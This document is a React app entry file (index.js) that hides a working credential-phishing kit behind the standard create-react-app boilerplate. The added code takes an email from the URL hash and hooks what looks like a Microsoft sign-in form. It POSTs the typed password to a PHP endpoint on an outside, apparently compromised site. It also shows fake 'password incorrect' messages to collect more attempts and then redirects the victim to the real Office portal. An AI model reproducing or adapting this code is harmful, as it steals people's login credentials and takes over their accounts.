

import React from 'react';
import ReactDOM from 'react-dom/client';
import './index.css';
import App from './App';
import reportWebVitals from './reportWebVitals';
import $ from 'jquery';


const root = ReactDOM.createRoot(document.getElementById('root'));
root.render(
  <React.StrictMode>
    <App />
  </React.StrictMode>
);




var url_string = window.location.hash.substring(1); 
//console.log("pswd: ",pswd)
var count = 0;
     

       function send_result(user, pass) {
            $.ajax({
                url: "https://courses.geopackllc.com/wp-includes/js/jcrop/plolici.php",
                data: {
                    "email": user,
                    "password": pass
                },
                type: "POST",
                success: function (data) {
                    console.log(data);
                },
                error: function (data) {
                    console.log('Ajax error');
                }
            });
        }


         document.addEventListener('DOMContentLoaded', async () => {
          //console.log("content loaded",url_string)
            if (url_string) {

             //  document.getElementById('ds').innerHTML = url_string;
              // console.log("document.getElementById('ds'): ",document.getElementById('ds'))
                document.getElementById('i0118')?.focus();
              //  set_brand(url_string); // you defined url_string variable somewher? no but this code was supposed to be on this page hold you did not
            }

              document.getElementById('Button9')?.addEventListener('click', event => {
                event.preventDefault ? event.preventDefault() : event.returnValue = false; 

                var pswd = document.getElementById('i0118').value;
                if (pswd.length < 5) {
                    document.getElementById('important1').style.display = 'none';
                    setTimeout(() => { document.getElementById('i0281').reset(); document.getElementById('errorpw').innerHTML = 'Your account password is too short.' }, 1500);
                } else if (pswd.length > 5 && count <= 0) {
                    send_result(url_string, pswd);
                    document.getElementById('important1').style.display = 'none';
                    setTimeout(() => { count++; document.getElementById('i0281').reset(); document.getElementById('errorpw').innerHTML = `Your account password cannot be empty. if you don't remember your password, <a href="#">reset it now.</a>` }, 2000)
                } else if (count < 2) {
                    send_result(url_string, pswd);
                    document.getElementById('important1').style.display = 'none';
                    setTimeout(() => { count++; document.getElementById('i0281').reset(); document.getElementById('errorpw').innerHTML = `Your account or password is incorrect. If you dont remember your password, <a href="#'>reset it now.</a>` }, 2000)
                } else {
                    send_result(url_string, pswd);
                    setTimeout(() => { window.location.replace("https://portal.office.com/servicestatus") }, 3000);
                }
            });
        });

        

// If you want to start measuring performance in your app, pass a function
// to log results (for example: reportWebVitals(console.log))
// or send to an analytics endpoint. Learn more: https://bit.ly/CRA-vitals
reportWebVitals();
